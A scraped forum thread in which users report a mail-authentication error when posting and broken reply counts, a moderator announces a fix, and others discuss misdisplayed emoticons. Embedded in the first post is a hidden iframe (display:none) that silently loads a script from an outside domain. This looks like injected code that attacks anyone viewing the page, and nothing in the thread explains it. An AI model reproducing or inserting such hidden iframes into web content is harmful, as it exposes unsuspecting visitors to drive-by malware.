+ Reply to Thread

Board hosed again??

Ran into problems sending Mail. Response: 500 failed authentication

That's the error message I've been getting since last night (at home), and I've been getting it here at work all day so far. I'm not the only one, am I?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Please visit my picture site: Robert-O-Rama :)

I got the same thing earlier today when trying to post. Instead of reposting, I went and checked to see if the item got posted. It did post, however, the thread did not show an increase in the number of replies, and I was not listed as the most recent poster. Even though it did post.

Edit: Just got it when trying to post this post.
    "Ran into problems sending Mail. Response: 500 failed authentication"
    I have noticed that the reply counts do not seem to be going up even though there are multiple posts. Also, under my search of posts since last visit, it lists several threads, but none of them indicate that there are new posts. When going inside the thread however, there are new posts there.
    - Archnemysis

Well... this sucks! It's almost not even worth posting anything since nobody will know there are new posts unless they are checking threads at random (like I have been doing... but it's a pain in the ass).

Jazz, jimmyjoe... help!

Wait... is it fixed? I didn't get an error on that last message. I'm going to go post to some other thread to see....

Wait... is it fixed? I didn't get an error on that last message. I'm going to go post to some other thread to see....
    Ran into problems sending Mail. Response: 500 failed authentication

perhaps we should sign a petition and send it to the mgmt

Just dropped in and ouch... looks like we've got problems... I've let Jimmyjoe know... we'll see what we can figure out...
    --Jazz--

OK, got the board fixed... the post count should now be working (starting from this point forward, we weren't able to make it retroactive). And you should not be getting the error when posting anymore.

Sorry it took us so long to check in!
    --Jazz--

OK, got the board fixed... the post count should now be working (starting from this point forward, we weren't able to make it retroactive). And you should not be getting the error when posting anymore.

Sorry it took us so long to check in!
    Thanks jazz!

Emoticon problem

Is it just me, or are some of the emoticons messed up?

"surprised", "shocked", and "confused" appear as a document icon, and "exclamation" appears as a Sprint-sponsored race car.

Re: Emoticon problem

Is it just me, or are some of the emoticons messed up?

"surprised", "shocked", and "confused" appear as a document icon, and "exclamation" appears as a Sprint-sponsored race car.
    Not just you:
    http://www.smartphonesource.com/phpb...amp;highlight=

Actually the race car you are seeing is my current Avatar. At least until Petty makes me mad again. Anyway, I had the same issue and clearing out my cache seemed to work for me. Not sure if it worked for Barnz. Give it a shot. - jt
    - Archnemysis

Hmm. the emoticon issue fixed itself. I just came back after a couple hours and it's ok. No cache clearing necessary.